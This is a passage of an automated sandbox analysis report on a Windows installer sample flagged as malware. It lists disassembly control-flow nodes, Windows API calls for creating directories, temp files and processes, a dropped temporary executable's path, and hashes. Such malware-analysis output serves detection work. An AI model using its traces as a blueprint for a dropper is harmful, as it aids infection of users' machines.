                                                                                                                                                                  • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 505 401751-401774 call 402a29 call 405727 510 401776-40177c call 405bc7 505->510 511 40177e-401790 call 405bc7 call 4056ba lstrcatA 505->511 516 401795-40179b call 405e29 510->516 511->516 521 4017a0-4017a4 516->521 522 4017a6-4017b0 call 405ec2 521->522 523 4017d7-4017da 521->523 530 4017c2-4017d4 522->530 531 4017b2-4017c0 CompareFileTime 522->531 525 4017e2-4017fe call 40589e 523->525 526 4017dc-4017dd call 40587f 523->526 533 401800-401803 525->533 534 401876-40189f call 404eb3 call 402e8e 525->534 526->525 530->523 531->530 536 401805-401847 call 405bc7 * 2 call 405be9 call 405bc7 call 405488 533->536 537 401858-401862 call 404eb3 533->537 548 4018a1-4018a5 534->548 549 4018a7-4018b3 SetFileTime 534->549 536->521 569 40184d-40184e 536->569 546 40186b-401871 537->546 550 4028c7 546->550 548->549 552 4018b9-4018c4 FindCloseChangeNotification 548->552 549->552 553 4028c9-4028cd 550->553 555 4018ca-4018cd 552->555 556 4028be-4028c1 552->556 558 4018e2-4018e5 call 405be9 555->558 559 4018cf-4018e0 call 405be9 lstrcatA 555->559 556->550 563 4018ea-402246 call 405488 558->563 559->563 563->553 563->556 569->546 571 401850-401851 569->571 571->537
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                                                                                                    • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,ylpuxzibyo Setup,NSIS Error), ref: 00405BD4
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041924B,771B23A0), ref: 00404F0F
                                                                                                                                                                    • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $C:\Users\user~1\AppData\Local\Temp
                                                                                                                                                                  • API String ID: 1941528284-3367238698
                                                                                                                                                                  • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                                                                                                  • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                                                                                                                                  • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                                                                                                  • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 572 405375-4053c0 CreateDirectoryA 573 4053c2-4053c4 572->573 574 4053c6-4053d3 GetLastError 572->574 575 4053ed-4053ef 573->575 574->575 576 4053d5-4053e9 SetFileSecurityA 574->576 576->573 577 4053eb GetLastError 576->577 577->575
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004053CC
                                                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004053EB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                  • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                                                                                                  • API String ID: 3449924974-621692704
                                                                                                                                                                  • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                                                                  • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                                                                                                                                  • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                                                                  • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 578 405ee9-405f09 GetSystemDirectoryA 579 405f0b 578->579 580 405f0d-405f0f 578->580 579->580 581 405f11-405f19 580->581 582 405f1f-405f21 580->582 581->582 583 405f1b-405f1d 581->583 584 405f22-405f54 wsprintfA LoadLibraryExA 582->584 583->584
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                                                                                                                                                                  • wsprintfA.USER32 ref: 00405F39
                                                                                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                                                                                  • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                                                                  • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                                                                                                                                  • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 585 4058cd-4058d7 586 4058d8-405902 GetTickCount GetTempFileNameA 585->586 587 405911-405913 586->587 588 405904-405906 586->588 590 40590b-40590e 587->590 588->586 589 405908 588->589 589->590
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004058E0
                                                                                                                                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                                                                                                                                  Strings
                                                                                                                                                                  • nsa, xrefs: 004058D9
                                                                                                                                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058D0, 004058D4
                                                                                                                                                                  • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 004058CD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                                                                                  • API String ID: 1716503409-3966375320
                                                                                                                                                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                                                                  • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                                                                                                                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                                                                  • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 591 4015b3-4015c6 call 402a29 call 40574e 596 4015c8-4015db call 4056e5 591->596 597 40161c-40161f 591->597 605 4015f3-4015f4 call 4053f2 596->605 606 4015dd-4015e0 596->606 599 401621-40163c call 401423 call 405bc7 SetCurrentDirectoryA 597->599 600 40164a-40219c call 401423 597->600 612 4028be-4028cd 599->612 616 401642-401645 599->616 600->612 613 4015f9-4015fb 605->613 606->605 610 4015e2-4015e9 call 40540f 606->610 610->605 621 4015eb-4015ec call 405375 610->621 618 401612-40161a 613->618 619 4015fd-401602 613->619 616->612 618->596 618->597 623 401604-40160d GetFileAttributesA 619->623 624 40160f 619->624 626 4015f1 621->626 623->618 623->624 624->618 626->613
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                                                                    • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                                                                                                    • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                                                                    • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                                                                                                  Strings
                                                                                                                                                                  • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401629
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                  • String ID: C:\Users\user~1\AppData\Local\Temp
                                                                                                                                                                  • API String ID: 1892508949-3107243751
                                                                                                                                                                  • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                                                                                                  • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                                                                                                                                                  • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                                                                                                  • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 627 40579b-4057b6 call 405bc7 call 40574e 632 4057b8-4057ba 627->632 633 4057bc-4057c9 call 405e29 627->633 634 40580e-405810 632->634 637 4057d5-4057d7 633->637 638 4057cb-4057cf 633->638 640 4057ed-4057f6 lstrlenA 637->640 638->632 639 4057d1-4057d3 638->639 639->632 639->637 641 4057f8-40580c call 4056ba GetFileAttributesA 640->641 642 4057d9-4057e0 call 405ec2 640->642 641->634 647 4057e2-4057e5 642->647 648 4057e7-4057e8 call 405701 642->648 647->632 647->648 648->640
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,ylpuxzibyo Setup,NSIS Error), ref: 00405BD4
                                                                                                                                                                    • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                                                                    • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                                                                                                    • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                                                                                                  • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 004057EE
                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 004057FE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                  • String ID: C:\
                                                                                                                                                                  • API String ID: 3248276644-3404278061
                                                                                                                                                                  • Opcode ID: 23b4c1e045f8e95cfcd418ff1664a298a1bdaee650c8a20779d7746134bd3734
                                                                                                                                                                  • Instruction ID: dbe731a3e552e7e8bf63b17cabef30e108f51aae268418cbcb714f920067e67f
                                                                                                                                                                  • Opcode Fuzzy Hash: 23b4c1e045f8e95cfcd418ff1664a298a1bdaee650c8a20779d7746134bd3734
                                                                                                                                                                  • Instruction Fuzzy Hash: 9FF0CD35105E5196D63233365C45A9F5A59CE46334F14053FF891B32D1DB3C8943ADBE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 650 401389-40138e 651 4013fa-4013fc 650->651 652 401390-4013a0 651->652 653 4013fe 651->653 652->653 655 4013a2-4013a3 call 401434 652->655 654 401400-401401 653->654 657 4013a8-4013ad 655->657 658 401404-401409 657->658 659 4013af-4013b7 call 40136d 657->659 658->654 662 4013b9-4013bb 659->662 663 4013bd-4013c2 659->663 664 4013c4-4013c9 662->664 663->664 664->651 665 4013cb-4013f4 MulDiv SendMessageA 664->665 665->651
                                                                                                                                                                  APIs
                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                  • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: ro
                                                                                                                                                                  • API String ID: 3850602802-607515425
                                                                                                                                                                  • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                                                                                                  • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                                                                                                                                                  • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 666 405427-405454 CreateProcessA 667 405462-405463 666->667 668 405456-40545f CloseHandle 666->668 668->667
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405459
                                                                                                                                                                  Strings
                                                                                                                                                                  • Error launching installer, xrefs: 0040543A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                  • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                                                                                                  • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                                                                                                                                                  • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                                                                                                  • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041924B,771B23A0), ref: 00404F0F
                                                                                                                                                                    • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                                                                    • Part of subcall function 00405427: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                                                                                                    • Part of subcall function 00405427: CloseHandle.KERNEL32(?), ref: 00405459
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                                                                                                                                                  • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
